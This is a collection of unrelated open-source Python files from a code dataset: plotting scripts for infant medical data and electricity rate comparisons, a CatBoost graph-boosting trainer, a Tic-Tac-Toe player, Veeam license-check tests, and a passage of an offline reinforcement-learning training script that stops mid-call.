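ohlcv = f.get_create_ohlcv('1h')      # compound dataset of shape (366 * 24,)
# (timestamp, open, high, low, close, volume) matching ochlv_type
ohlcv[0] = (1514764800000, 13850.0, 13920.5, 13790.0, 13880.2, 1523.4)
print(ohlcv[0]['close'])              # 13880.2
f.destroy()                           # calls the parent class close()
```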
{
"source": "jiuguangw/Agenoria",
"score": 3
} |
#### File: Agenoria/agenoria/plot_medical_charts.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from pandas.plotting import register_matplotlib_converters
from .parse_config import parse_json_config
from .plot_settings import format_monthly_plot, export_figure
# Settings
config = []
def plot_daycare_days(plot_object, data):
# Group and compute sum by month. BMS gives 1st of month
daycare_monthly = data['Daycare'].resample('BMS').sum()
# Plot
plot_object.plot(daycare_monthly.index, daycare_monthly)
plot_object.set_title('Number of Days in Daycare by Months')
plot_object.set_ylabel('Number of Days')
plot_object.yaxis.set_ticks(np.arange(0, 21, 2))
format_monthly_plot(plot_object, daycare_monthly.index[0],
daycare_monthly.index[-1])
def plot_days_between_vomit(plot_object, data):
# Look up vomit days and compute gaps
vomit_days = data.loc[data['Vomit'] == 1]
days_since_last_vomit = vomit_days['Date'].diff() / np.timedelta64(1, 'D')
# Plots
plot_object.plot(vomit_days['Date'], days_since_last_vomit)
plot_object.set_title('Days Since Last Vomit')
plot_object.set_xlabel('Date')
plot_object.set_ylabel('Days Since Last Vomit')
format_monthly_plot(
plot_object, vomit_days.index[0], vomit_days.index[-1])
def plot_doctor_visit_monthly(plot_object, data):
# Group and compute sum by month. BMS gives 1st of month
doctor_monthly = data['Doctor'].resample('BMS').sum()
# Plot
plot_object.plot(doctor_monthly.index, doctor_monthly)
plot_object.set_title('Total Number of Doctor Visits by Months')
plot_object.set_ylabel('Total Number of Doctor Visits')
plot_object.yaxis.set_ticks(np.arange(0, 5, 1))
format_monthly_plot(plot_object, doctor_monthly.index[0],
doctor_monthly.index[-1])
def plot_monthly_vomit(plot_object, data):
# Group and compute sum by month. BMS gives 1st of month
vomit_monthly = data['Vomit'].resample('BMS').sum()
# Plot
plot_object.plot(vomit_monthly.index, vomit_monthly)
plot_object.set_title('Total Number of Vomits by Months')
plot_object.set_ylabel('Total Number of Vomits')
format_monthly_plot(plot_object, vomit_monthly.index[0],
vomit_monthly.index[-1])
def plot_medical_charts(config_file):
register_matplotlib_converters()
# Style
sns.set(style="darkgrid")
f, axarr = plt.subplots(2, 3)
# Import configs
global config
config = parse_json_config(config_file)
# Import data
data = pd.read_csv(config['data_misc'], parse_dates=['Date'])
data.fillna(0, inplace=True)
data = data.set_index(data['Date'])
# Chart 1 - Total Vomit Per Month
plot_monthly_vomit(axarr[0, 0], data)
# Chart 2 - Days Between Vomit
plot_days_between_vomit(axarr[0, 1], data)
# Chart 3 - Days in Daycare
plot_daycare_days(axarr[0, 2], data)
# Chart 4 - Doctor Visits
plot_doctor_visit_monthly(axarr[1, 0], data)
# Export
f.subplots_adjust(wspace=0.25, hspace=0.35)
export_figure(f, config['output_dim_x'], config['output_dim_y'],
config['output_medical_charts'])
```
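`plot_medical_charts()` is driven entirely by a JSON config. A usage sketch with made-up paths (only the key names come from the code above, and it assumes `parse_json_config` simply loads the JSON file):
```python
import json

# Hypothetical config; 'data_misc' must point at a CSV with Date, Vomit,
# Daycare and Doctor columns, as read by the function above.
config = {
    "data_misc": "data/misc.csv",
    "output_dim_x": 11,
    "output_dim_y": 8.5,
    "output_medical_charts": "output/medical_charts.pdf",
}
with open("config_medical.json", "w") as fh:
    json.dump(config, fh)

from agenoria.plot_medical_charts import plot_medical_charts
plot_medical_charts("config_medical.json")
```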
#### File: Agenoria/agenoria/plot_settings.py
```python
from matplotlib.dates import MonthLocator, DateFormatter
import numpy as np
import math
def enumerate_labels(date_num):
hour_labels = []
for num in range(0, 24):
label = str(num) + ':00'
hour_labels.append(label)
week_labels = []
for num in range(0, math.ceil(date_num / 7), 2):
label = str(num)
week_labels.append(label)
return hour_labels, week_labels
def format_24h_week_plot_horizontal(ax, date_num, title):
# Figure settings
TITLE_FONT_SIZE = 25
AXIS_FONT_SIZE = 15
TITLE_HEIGHT_ADJUST = 1.02
# Create the tick labels
hour_labels, week_labels = enumerate_labels(date_num)
# Set title and axis labels
ax.set_title(title, fontsize=TITLE_FONT_SIZE, y=TITLE_HEIGHT_ADJUST)
ax.set_xlabel('Age (weeks)', fontsize=AXIS_FONT_SIZE)
ax.set_ylabel('Time of Day', fontsize=AXIS_FONT_SIZE)
# Format y axis - clock time
ax.set_ylim(0, 24)
ax.yaxis.set_ticks(np.arange(0, 24, 1))
ax.set_yticklabels(hour_labels)
ax.invert_yaxis()
# Format x axis - bottom, week number
ax.set_xlim(1, date_num)
ax.xaxis.set_ticks(np.arange(1, date_num + 1, 14))
ax.set_xticklabels(week_labels)
def format_24h_week_plot_vertical(ax, date_num, title):
# Figure settings
AXIS_FONT_SIZE = 15
# Create the tick labels
hour_labels, week_labels = enumerate_labels(date_num)
# Set title and axis labels
ax.set_xlabel('Age (weeks)', fontsize=AXIS_FONT_SIZE, rotation=180)
ax.set_ylabel('Time of Day', fontsize=AXIS_FONT_SIZE)
# Format y axis - clock time
ax.set_ylim(24, 0)
ax.yaxis.set_ticks(np.arange(0, 24, 1))
ax.set_yticklabels(hour_labels, rotation=180)
ax.invert_yaxis()
# Format x axis - bottom, week number
ax.set_xlim(1, date_num)
ax.xaxis.set_ticks(np.arange(1, date_num + 1, 14))
ax.set_xticklabels(week_labels, rotation=90)
def format_growth_chart_plot(plot_object):
# Figure settings
TITLE_FONT_SIZE = 14
AXIS_FONT_SIZE = 10
# Change label sizes
plot_object.title.set_size(TITLE_FONT_SIZE)
plot_object.xaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.yaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.tick_params(labelsize=AXIS_FONT_SIZE)
def format_monthly_plot(plot_object, xlim_left, xlim_right):
# Figure settings
TITLE_FONT_SIZE = 10
AXIS_FONT_SIZE = 8
# Axis label
plot_object.set_xlabel('Date')
# Change x-axis left and right limits
plot_object.set_xlim(xlim_left, xlim_right)
plot_object.autoscale(enable=True, axis='y', tight=True)
# Change label sizes
plot_object.title.set_size(TITLE_FONT_SIZE)
plot_object.xaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.yaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.tick_params(labelsize=AXIS_FONT_SIZE)
# Change tick spacing
plot_object.set_xticks(plot_object.get_xticks()[::1])
plot_object.xaxis.set_major_locator(
MonthLocator(range(1, 13), bymonthday=1, interval=1))
plot_object.xaxis.set_major_formatter(DateFormatter("%b"))
def export_figure(figure, dim_x, dim_y, output_filename):
# Export
figure.set_size_inches(dim_x, dim_y)
figure.savefig(output_filename, bbox_inches='tight')
figure.clf()
``` |
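A short sketch of the two general-purpose helpers above on synthetic data: `format_monthly_plot()` fixes the x-limits and month-name ticks on an axis, and `export_figure()` sizes and saves the figure (it assumes the package is importable as `agenoria.plot_settings`):
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from agenoria.plot_settings import format_monthly_plot, export_figure

dates = pd.date_range("2019-01-01", "2019-12-01", freq="MS")
values = np.random.randint(0, 10, len(dates))

fig, ax = plt.subplots()
ax.plot(dates, values)
ax.set_title("Synthetic monthly counts")
format_monthly_plot(ax, dates[0], dates[-1])
export_figure(fig, 11, 7, "synthetic_monthly.pdf")
```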
{
"source": "jiuguangw/dte_calculator",
"score": 2
} |
#### File: jiuguangw/dte_calculator/dte_calculator.py
```python
import dte
import sys
def main():
dte.dte_calculator(sys.argv[1])
main()
```
#### File: dte_calculator/dte/dte.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from pandas.plotting import register_matplotlib_converters
from matplotlib.dates import MonthLocator, DateFormatter
# Rate reference:
# https://newlook.dteenergy.com/wps/wcm/connect/23195474-a4d1-4d38-aa30-a4426fd3336b/WholeHouseRateOptions.pdf?MOD=AJPERES
# Residential Electric Service Rate
RES_CUTOFF = 17
RES_CAP_RATE_17KWH = 0.03705
RES_NON_CAP_RATE_17KWH = 0.04687
RES_CAP_RATE_ADDITIONAL = 0.05339
RES_NON_CAP_RATE_ADDITIONAL = 0.04687
# Time of Day Rate
TOD_SUMMER_CAP_PEAK = 0.12375
TOD_SUMMER_NON_CAP_PEAK = 0.04554
TOD_SUMMER_CAP_OFF_PEAK = 0.01145
TOD_SUMMER_NON_CAP_OFF_PEAK = 0.04554
TOD_WINTER_CAP_PEAK = 0.09747
TOD_WINTER_NON_CAP_PEAK = 0.04554
TOD_WINTER_CAP_OFF_PEAK = 0.00922
TOD_WINTER_NON_CAP_OFF_PEAK = 0.04554
# Delivery charges
RATE_SERVICE = 7.5
RATE_DISTRIBUTION_KWH = 0.06109
RATE_WASTE_REDUCTION = 0.004487
RATE_LIEAF = 0.92
RATE_NUCLEAR_SURCHARGE = 0.000827
RATE_TRANSITIONAL_RECOVERY = 0.001030
RATE_SALES_TAX = 0.06
# Sample method
SAMPLE_METHOD = 'BMS' # BMS
# US Average
US_AVERAGE = 867
# Figure settings
TITLE_FONT_SIZE = 10
AXIS_FONT_SIZE = 8
def compute_delivery_charges(kwh_monthly):
total = RATE_SERVICE
total += kwh_monthly * RATE_DISTRIBUTION_KWH
total += kwh_monthly * RATE_WASTE_REDUCTION
total += kwh_monthly * RATE_NUCLEAR_SURCHARGE
total += kwh_monthly * RATE_TRANSITIONAL_RECOVERY
total += RATE_LIEAF
return total
def compute_ToD_rate(data_raw):
# Init
data = data_raw
data['Cost_Cap'] = 0
data['Cost_NonCap'] = 0
# Weekday filter
index_weekday = data.index.weekday < 5
index_weekend = data.index.weekday >= 5
# Season filter
index_summer = np.logical_and(
data.index.month >= 6, data.index.month <= 10)
index_winter = np.logical_or(
data.index.month >= 11, data.index.month <= 5)
# Hour filter
# combine the hour window with the weekday/weekend filters; a third positional
# argument to np.logical_and/np.logical_or would be treated as the `out` array
index_peak = np.logical_and.reduce([data.index.hour >= 11, data.index.hour <= 18, index_weekday])
index_off_peak = np.logical_or.reduce([data.index.hour < 11, data.index.hour > 18, index_weekend])
# Combine filters
index_summer_peak = np.logical_and(index_summer, index_peak)
index_summer_off_peak = np.logical_and(index_summer, index_off_peak)
index_winter_peak = np.logical_and(index_winter, index_peak)
index_winter_off_peak = np.logical_and(index_winter, index_off_peak)
# Calculate summer, peak
summer_peak = data['Total'].loc[index_summer_peak]
data.loc[index_summer_peak, 'Cost_Cap'] = summer_peak * TOD_SUMMER_CAP_PEAK
data.loc[index_summer_peak, 'Cost_NonCap'] = summer_peak * \
TOD_SUMMER_NON_CAP_PEAK
# Calculate summer, off peak
summer_off_peak = data['Total'].loc[index_summer_off_peak]
data.loc[index_summer_off_peak, 'Cost_Cap'] = summer_off_peak * \
TOD_SUMMER_CAP_OFF_PEAK
data.loc[index_summer_off_peak, 'Cost_NonCap'] = summer_off_peak * \
TOD_SUMMER_NON_CAP_OFF_PEAK
# Calculate winter, peak
winter_peak = data['Total'].loc[index_winter_peak]
data.loc[index_winter_peak, 'Cost_Cap'] = winter_peak * \
TOD_WINTER_CAP_PEAK
data.loc[index_winter_peak, 'Cost_NonCap'] = winter_peak * \
TOD_WINTER_NON_CAP_PEAK
# Calculate winter, off peak
winter_off_peak = data['Total'].loc[index_winter_off_peak]
data.loc[index_winter_off_peak, 'Cost_Cap'] = winter_off_peak * \
TOD_WINTER_CAP_OFF_PEAK
data.loc[index_winter_off_peak, 'Cost_NonCap'] = winter_off_peak * \
TOD_WINTER_NON_CAP_OFF_PEAK
# Calculate delivery charges
kwh_monthly = data['Total'].resample(SAMPLE_METHOD).sum()
delivery_charges_monthly = compute_delivery_charges(kwh_monthly)
# Total cost
data['Total Cost'] = data['Cost_Cap'] + data['Cost_NonCap']
cost_monthly = data['Total Cost'].resample(SAMPLE_METHOD).sum()
sales_tax = cost_monthly * RATE_SALES_TAX
total = cost_monthly + delivery_charges_monthly + sales_tax
# Consumption on peak
consumption_peak = data['Total'].loc[index_peak].resample(
SAMPLE_METHOD).sum()
consumption_offpeak = data['Total'].loc[index_off_peak].resample(
SAMPLE_METHOD).sum()
return total, consumption_peak, consumption_offpeak
def compute_RES_rate(data_raw):
# Compute daily total consumption
data = data_raw['Total'].resample('D').sum().to_frame()
data['Cost_CAP_17'] = RES_CUTOFF * RES_CAP_RATE_17KWH
data['Cost_NON_CAP_17'] = RES_CUTOFF * RES_NON_CAP_RATE_17KWH
data['Cost_CAP_ADD'] = 0
data['Cost_NON_CAP_ADD'] = 0
# Filter
index = data['Total'] > RES_CUTOFF
data.loc[index, 'Cost_CAP_ADD'] = (
data['Total'] - RES_CUTOFF) * RES_CAP_RATE_ADDITIONAL
data.loc[index, 'Cost_NON_CAP_ADD'] = (
data['Total'] - RES_CUTOFF) * RES_NON_CAP_RATE_ADDITIONAL
# Compute delivery charges
kwh_monthly = data['Total'].resample(SAMPLE_METHOD).sum()
delivery_charges_monthly = compute_delivery_charges(kwh_monthly)
# Total cost
data['Total Cost'] = data['Cost_CAP_17'] + data['Cost_NON_CAP_17'] + \
data['Cost_CAP_ADD'] + data['Cost_NON_CAP_ADD']
cost_monthly = data['Total Cost'].resample(SAMPLE_METHOD).sum()
sales_tax = cost_monthly * RATE_SALES_TAX
total = cost_monthly + delivery_charges_monthly + sales_tax
return total
def format_plots(plot_object):
# Set label
plot_object.set_xlabel('Date')
# Change label sizes
plot_object.title.set_size(TITLE_FONT_SIZE)
plot_object.xaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.yaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.tick_params(labelsize=AXIS_FONT_SIZE)
# Change tick spacing
plot_object.set_xticks(plot_object.get_xticks()[::1])
plot_object.xaxis.set_major_locator(
MonthLocator(range(1, 13), bymonthday=1, interval=2))
plot_object.xaxis.set_major_formatter(DateFormatter("%b"))
def dte_calculator(filename):
register_matplotlib_converters()
# Style
sns.set(style="darkgrid")
f, axarr = plt.subplots(2, 2)
# Import data
data = pd.read_csv(filename, parse_dates=[['Day', 'Hour of Day']])
data = data.set_index(data['Day_Hour of Day'])
data.index.rename('Date', inplace=True)
data.rename(columns={'Hourly Total': 'Total'}, inplace=True)
# Compute cost for the Residential Electric Service Rate
cost_monthly_res = compute_RES_rate(data)
# Compute cost for the Time of Day Service Rate
cost_monthly_ToD, consumption_peak, consumption_offpeak = compute_ToD_rate(
data)
# Compute consumption KWH by month
kwh_monthly = data['Total'].resample(SAMPLE_METHOD).sum()
# Compute savings
savings_monthly = cost_monthly_res - cost_monthly_ToD
res_total = round(cost_monthly_res.sum(), 2)
tod_total = round(cost_monthly_ToD.sum(), 2)
savings_total = round(savings_monthly.sum(), 2)
# Plot 1 - Consumption
axarr[0, 0].plot(kwh_monthly.index, kwh_monthly)
axarr[0, 0].set_title('Consumption by Month (kWh)')
axarr[0, 0].set_ylabel('Consumption (kWh)')
axarr[0, 0].axhline(US_AVERAGE, linewidth=1, color='r',
ls='--', label='US Residential Average')
axarr[0, 0].legend()
format_plots(axarr[0, 0])
# Plot 2 - Peak vs Off Peak
axarr[0, 1].plot(consumption_peak.index, consumption_peak, label='Peak')
axarr[0, 1].plot(consumption_offpeak.index,
consumption_offpeak, label='Off Peak')
axarr[0, 1].set_title('Consumption by Month, Peak vs Off Peak')
axarr[0, 1].set_ylabel('Consumption (kWh)')
axarr[0, 1].legend()
format_plots(axarr[0, 1])
# Plot 3 - Services
axarr[1, 0].plot(cost_monthly_res.index, cost_monthly_res,
label='Standard RES Service')
axarr[1, 0].plot(cost_monthly_ToD.index,
cost_monthly_ToD, label='Time of Day Service')
axarr[1, 0].set_title('Total Cost by Month')
axarr[1, 0].set_ylabel('Cost in US Dollars')
axarr[1, 0].legend()
format_plots(axarr[1, 0])
# Plot 4 - Savings
axarr[1, 1].plot(cost_monthly_ToD.index, savings_monthly)
axarr[1, 1].set_title('Total Savings by Month')
axarr[1, 1].set_ylabel('Cost in US Dollars')
plt.text(0.45, 0.9, "RES Total: $" + str(res_total),
transform=axarr[1, 1].transAxes)
plt.text(0.45, 0.8, "ToD Total: $" + str(tod_total),
transform=axarr[1, 1].transAxes)
plt.text(0.45, 0.7, "Savings Total: $" + str(savings_total),
transform=axarr[1, 1].transAxes)
format_plots(axarr[1, 1])
# Export
f.subplots_adjust(wspace=0.25, hspace=0.35)
f.set_size_inches(11, 7)
f.savefig('DTE.pdf', bbox_inches='tight')
f.clf()
``` |
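A worked sketch of `compute_delivery_charges()` for a hypothetical month of 500 kWh, spelling out the same constants the function uses: the flat service charge, four per-kWh riders, and the fixed LIEAF charge (it assumes the repo's `dte` package is on the path):
```python
from dte.dte import compute_delivery_charges

kwh = 500
expected = (7.5                  # RATE_SERVICE
            + kwh * 0.06109      # RATE_DISTRIBUTION_KWH
            + kwh * 0.004487     # RATE_WASTE_REDUCTION
            + kwh * 0.000827     # RATE_NUCLEAR_SURCHARGE
            + kwh * 0.001030     # RATE_TRANSITIONAL_RECOVERY
            + 0.92)              # RATE_LIEAF
print(round(compute_delivery_charges(kwh), 2))   # ~42.14
print(round(expected, 2))                        # same value
```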
{
"source": "JiuhaiChen/GBDT",
"score": 2
} |
#### File: JiuhaiChen/GBDT/GBDT.py
```python
import sys
import time
LARGE_NUMBER = sys.maxsize
import numpy as np
import torch
import pdb
import torch.nn.functional as F
from modules import UnfoldindAndAttention
import pandas as pd
from Base import *
from collections import defaultdict as ddict
from catboost import Pool, CatBoostClassifier, CatBoostRegressor, sum_models
class GBDT(object):
def __init__(self, task, graph, train_mask, test_mask, val_mask):
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
self.task = task
self.graph = graph
self.train_mask = train_mask
self.test_mask = test_mask
self.val_mask = val_mask
self.params = {'learning_rate': 1.0}
self.best_iteration = None
self.iter_per_epoch = 10
self.depth = 6
self.gbdt_lr = 0.1
self.propagation_X = UnfoldindAndAttention(lam=20.0, prop_step=5)
self.propagation_y = UnfoldindAndAttention(lam=2.0, prop_step=5)
def _calc_data_scores(self, X, epoch):
if epoch == 0:
scores = torch.zeros(self.num_samples, self.out_dim)
else:
scores = self.gbdt_model.predict(X)
scores = torch.from_numpy(scores).float().view(self.num_samples, self.out_dim)
return scores.to(self.device)
def _calc_gradient(self, scores, labels):
scores.requires_grad_()
with torch.enable_grad():
assert len(scores.size()) == 2
scores_correct = self.propagation_y.forward(self.graph, scores)
if self.task == 'regression':
loss = F.mse_loss(scores_correct[self.train_mask], labels[self.train_mask], reduction='sum')
elif self.task == 'classification':
loss = F.cross_entropy(scores_correct[self.train_mask], labels[self.train_mask].long(), reduction='sum')
grad = torch.autograd.grad(loss, scores, only_inputs=True)[0]
grad = grad.detach()
return - grad.cpu().numpy()
def _calc_loss(self, X, y, metrics):
pred = self.gbdt_model.predict(X)
pred = torch.from_numpy(pred).float().view(self.num_samples, self.out_dim).to(self.device)
assert len(pred.size()) == 2
scores_correct = self.propagation_y.forward(self.graph, pred)
train_results = self.evaluate_model(scores_correct, y, self.train_mask)
test_results = self.evaluate_model(scores_correct, y, self.test_mask)
val_results = self.evaluate_model(scores_correct, y, self.val_mask)
# pdb.set_trace()
for metric_name in train_results:
metrics[metric_name].append((train_results[metric_name].detach().item(),
val_results[metric_name].detach().item(),
test_results[metric_name].detach().item()
))
return train_results, test_results, val_results
# return self.evaluate_model(scores_correct, y, self.train_mask), \
# self.evaluate_model(scores_correct, y, self.test_mask), \
# self.evaluate_model(scores_correct, y, self.val_mask),
def evaluate_model(self, logits, target_labels, mask):
metrics = {}
y = target_labels[mask]
with torch.no_grad():
pred = logits[mask]
if self.task == 'regression':
metrics['loss'] = torch.sqrt(F.mse_loss(pred, y))
metrics['accuracy'] = F.l1_loss(pred, y)
elif self.task == 'classification':
metrics['loss'] = F.cross_entropy(pred, y.long())
metrics['accuracy'] = torch.Tensor([(y == pred.max(1)[1]).sum().item()/y.shape[0]])
return metrics
def init_gbdt_model(self, num_epochs):
if self.task == 'regression':
catboost_model_obj = CatBoostRegressor
catboost_loss_fn = 'RMSE'
else:
catboost_model_obj = CatBoostRegressor
catboost_loss_fn = 'MultiRMSE'
return catboost_model_obj(iterations=num_epochs,
depth=self.depth,
learning_rate=self.gbdt_lr,
loss_function=catboost_loss_fn,
random_seed=0,
nan_mode='Min')
def fit_gbdt(self, pool, trees_per_epoch):
gbdt_model = self.init_gbdt_model(trees_per_epoch)
gbdt_model.fit(pool, verbose=False)
return gbdt_model
def append_gbdt_model(self, new_gbdt_model, weights):
if self.gbdt_model is None:
return new_gbdt_model
return sum_models([self.gbdt_model, new_gbdt_model], weights=weights)
def train_gbdt(self, gbdt_X_train, gbdt_y_train, cat_features, epoch,
gbdt_trees_per_epoch, gbdt_alpha):
pool = Pool(gbdt_X_train, gbdt_y_train, cat_features=cat_features)
epoch_gbdt_model = self.fit_gbdt(pool, gbdt_trees_per_epoch)
self.gbdt_model = self.append_gbdt_model(epoch_gbdt_model, weights=[1, gbdt_alpha])
def train(self, params, encoded_X, target, cat_features=None, num_boost_round=20, early_stopping_rounds=5):
self.params.update(params)
self.gbdt_model = None
self.epoch_gbdt_model = None
metrics = ddict(list)
shrinkage_rate = 1.0
best_iteration = None
best_val_loss = LARGE_NUMBER
train_start_time = time.time()
self.num_samples = target.size(0)
if self.task == 'regression':
self.out_dim = 1
elif self.task == 'classification':
self.out_dim = int(target.max() + 1)
target = target.squeeze()
print("Training until validation scores don't improve for {} rounds.".format(early_stopping_rounds))
## propagate the feature
assert len(encoded_X.size()) == 2
corrected_X = self.propagation_X.forward(self.graph, encoded_X)
## cat the propagated features and orignal features
feature = torch.cat((encoded_X, corrected_X), 1).cpu().numpy()
for iter_cnt in range(num_boost_round):
iter_start_time = time.time()
scores = self._calc_data_scores(feature, iter_cnt)
grad = self._calc_gradient(scores, target.to(self.device))
self.train_gbdt(feature, grad, cat_features, iter_cnt, self.iter_per_epoch, gbdt_alpha=shrinkage_rate)
# if iter_cnt > 0:
# shrinkage_rate *= self.params['learning_rate']
if iter_cnt > 0:
shrinkage_rate = self.params['learning_rate']
train_metric, test_metric, val_metric = self._calc_loss(feature, target.to(self.device), metrics)
train_loss = train_metric['loss']
test_loss = test_metric['loss']
val_loss = val_metric['loss']
test_accuracy = test_metric['accuracy']
val_loss_str = '{:.10f}'.format(val_loss) if val_loss else '-'
print("Iter {:>3}, Train's Loss: {:.10f}, Test's Loss: {}, Valid's Loss: {}, Test's Accuracy: {}, Elapsed: {:.2f} secs"
.format(iter_cnt, train_loss, test_loss, val_loss_str, test_accuracy.item(), time.time() - iter_start_time))
if val_loss is not None and val_loss < best_val_loss:
best_val_loss = val_loss
best_test_loss = test_loss
best_iteration = iter_cnt
best_test_accuracy = test_accuracy
# if iter_cnt - best_iteration >= early_stopping_rounds:
# print("Early stopping, best iteration is:")
# print("Iter {:>3}, Test Loss: {:.10f}".format(best_iteration, best_test_accuracy.item()))
# break
self.best_iteration = best_iteration
print("Training finished. Elapsed: {:.2f} secs".format(time.time() - train_start_time))
plot(metrics, ['train', 'val', 'test'], 'CBS', 'CBS')
exit()
if self.task == 'regression':
return best_test_loss.cpu().numpy()
elif self.task == 'classification':
return best_test_accuracy.cpu().numpy()
```
#### File: JiuhaiChen/GBDT/modules.py
```python
import pdb
import random
from functools import partial
import dgl
import torch
import torch.nn as nn
import torch.nn.functional as F
from dgl import function as fn
from torch.nn import init
from sklearn import preprocessing
from submodules import Propagate, PropagateNoPrecond , Attention
class UnfoldindAndAttention(nn.Module):
r"""
Parameters
----------
d : int
Size of hidden layers.
alp : float
The :math:`\alpha` in paper. If equal to :math:`0`, will be automatically decided based
on other hyperparameters. Default: ``0``.
lam : float
The :math:`\lambda` in paper. Default: ``1``.
prop_step : int
Number of propagation steps
attn_aft : int
Index of the layer after which to apply attention. Set to -1 to disable attention.
tau : float
The :math:`\tau` in paper. Default: ``0.2``.
T : float
The :math:`T` in paper. If < 0, :math:`T` will be set to `\infty`. Default: ``-1``.
p : float
The :math:`p` in paper. Default: ``1``.
use_eta : bool
Whether to use the eta vector.
init_att : bool
If True, add another attention layer before propagation. Default: ``False``.
attn_dropout : float
The dropout rate of attention values. Default: ``0.0``.
precond : bool
If True, use preconditioning and the unnormalized Laplacian; otherwise use
the normalized Laplacian without preconditioning. Default: ``False``
"""
def __init__(self, alp=0, lam=1, prop_step=5, tau=0.2, p=2, precond=False):
super().__init__()
self.alp = alp if alp > 0 else 1 / (lam + 1) # automatic set alpha
self.lam = lam
self.tau = tau
self.p = p
self.prop_step = prop_step
prop_method = Propagate if precond else PropagateNoPrecond
self.prop_layers = nn.ModuleList([prop_method() for _ in range(prop_step)])
self.post_step = lambda x:torch.clamp(x, -1, 1)
def forward(self, g, X, train_mask=None, label=False, error=False):
Y = X
g.edata["w"] = torch.ones(g.number_of_edges(), 1, device = g.device)
g.ndata["deg"] = g.in_degrees().float()
for k, layer in enumerate(self.prop_layers):
# do unfolding
Y = layer(g, Y, X, self.alp, self.lam)
if label == True:
Y[train_mask] = X[train_mask]
elif error == True:
Y = self.post_step(Y)
Y[train_mask] = X[train_mask]
return Y
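# Illustrative usage (a minimal sketch; the graph `g`, features `X` and
# `train_mask` are assumptions and not part of this module):
#   prop = UnfoldindAndAttention(lam=1.0, prop_step=5, precond=False)
#   Y = prop.forward(g, X)                            # plain propagation
#   Y = prop.forward(g, X, train_mask, label=True)    # clamp training labels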
``` |
{
"source": "jiujiujiu0313/jingziqi",
"score": 4
} |
#### File: jiujiujiu0313/jingziqi/player.py
```python
import board
class Player(object):
def __init__(self,name):
self.name=name
self.score=0
self.chess=None
def move(self,chess_board):
index=-1
while(index not in chess_board.movable_list):
try:
index=int(input("Please %s, choose a move position %s: " %(self.name,chess_board.movable_list)))
except ValueError:
pass
chess_board.move_down(index,self.chess)
if __name__=="__main__":
chess_board=board.Board()
human=Player("Player")
human.chess="x"
while(not chess_board.is_win(human.chess)):
human.move(chess_board)
chess_board.show_board()
``` |
{
"source": "jiuka/check_veeam_o365",
"score": 2
} |
#### File: plugins/agent_based/test_veeam_o356licenses.py
```python
import pytest # type: ignore[import]
from cmk.base.plugins.agent_based.agent_based_api.v1 import (
Metric,
Result,
Service,
State,
)
from cmk.base.plugins.agent_based import veeam_o365licenses
@pytest.mark.parametrize('section, result', [
([], []),
(
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50000']],
[Service(item='0')]
)
])
def test_discovery_veeam_o365licenses(section, result):
assert list(veeam_o365licenses.discovery_veeam_o365licenses(section)) == result
@pytest.mark.parametrize('item, params, section, result', [
('0', {}, [], []),
(
'0', {},
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50000']],
[
Result(state=State.OK, summary='License is vaild till 28.06.2020 02:00:00'),
Result(state=State.OK, summary='Period of validityt: 30 days 0 hours'),
Metric('licenses', 42.0, levels=(50000.0, 50000.0), boundaries=(0.0, 50000.0)),
Result(state=State.OK, summary='used 42 out of 50000 licenses (warn/crit at 50000/50000)'),
]
),
(
'0', {'validity': (3456000, 1728000)},
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50000']],
[
Result(state=State.OK, summary='License is vaild till 28.06.2020 02:00:00'),
Result(state=State.WARN, summary='Period of validityt: 30 days 0 hours (warn/crit below 40 days 0 hours/20 days 0 hours)'),
Metric('licenses', 42.0, levels=(50000.0, 50000.0), boundaries=(0.0, 50000.0)),
Result(state=State.OK, summary='used 42 out of 50000 licenses (warn/crit at 50000/50000)'),
]
),
(
'0', {'licenses': (10, 5)},
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50']],
[
Result(state=State.OK, summary='License is vaild till 28.06.2020 02:00:00'),
Result(state=State.OK, summary='Period of validityt: 30 days 0 hours'),
Metric('licenses', 42.0, levels=(40.0, 45.0), boundaries=(0.0, 50.0)),
Result(state=State.WARN, summary='used 42 out of 50 licenses (warn/crit at 40/45)'),
]
),
])
def test_check_veeam_o365licenses(item, params, section, result):
assert list(veeam_o365licenses.check_veeam_o365licenses(item, params, section)) == result
``` |
{
"source": "Jiukaishi/PARL",
"score": 2
} |
#### File: torch/iql/train.py
```python
import pickle
import argparse
import gym
from tqdm import trange
import d4rl
from parl.utils import logger, tensorboard
from replay_buffer import ReplayMemory
from mujoco_model import MujocoModel
from mujoco_agent import MujocoAgent
from parl.algorithms import IQL
import numpy as np
EVAL_EPISODES = 10
MEMORY_SIZE = int(2e6)
BATCH_SIZE = 256
# Runs the policy for `eval_episodes` episodes and returns the average reward
# A fixed seed is used for the eval environment
def run_evaluate_episodes(agent, env, eval_episodes):
eval_returns = []
for _ in range(eval_episodes):
avg_reward = 0.
obs = env.reset()
done = False
while not done:
action = agent.predict(obs)
obs, reward, done, _ = env.step(action)
avg_reward += reward
eval_returns.append(avg_reward)
eval_returns = np.array(eval_returns)
avg_reward = eval_returns.mean()
return avg_reward, eval_returns
def main():
logger.info("------------------- CQL ---------------------")
logger.info('Env: {}, Seed: {}'.format(args.env, args.seed))
logger.info("---------------------------------------------")
env = gym.make(args.env)
env.seed(args.seed)
obs_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
# Initialize model, algorithm, agent
model = MujocoModel(obs_dim, action_dim)
algorithm = IQL(model, max_steps=args.train_total_steps)
agent = MujocoAgent(algorithm)
# Initialize offline data
rpm = ReplayMemory(
max_size=MEMORY_SIZE, obs_dim=obs_dim, act_dim=action_dim)
rpm.load_from_d4rl(d4rl.qlearning_dataset(env))
total_steps = 0
test_flag = 0
result = []
for total_steps in trange(args.train_total_steps):
# Train steps
batch_obs, batch_action, batch_reward, batch_next_obs, batch_terminal = rpm.sample_batch(
BATCH_SIZE)
critic_loss, value_loss, actor_loss = agent.learn(
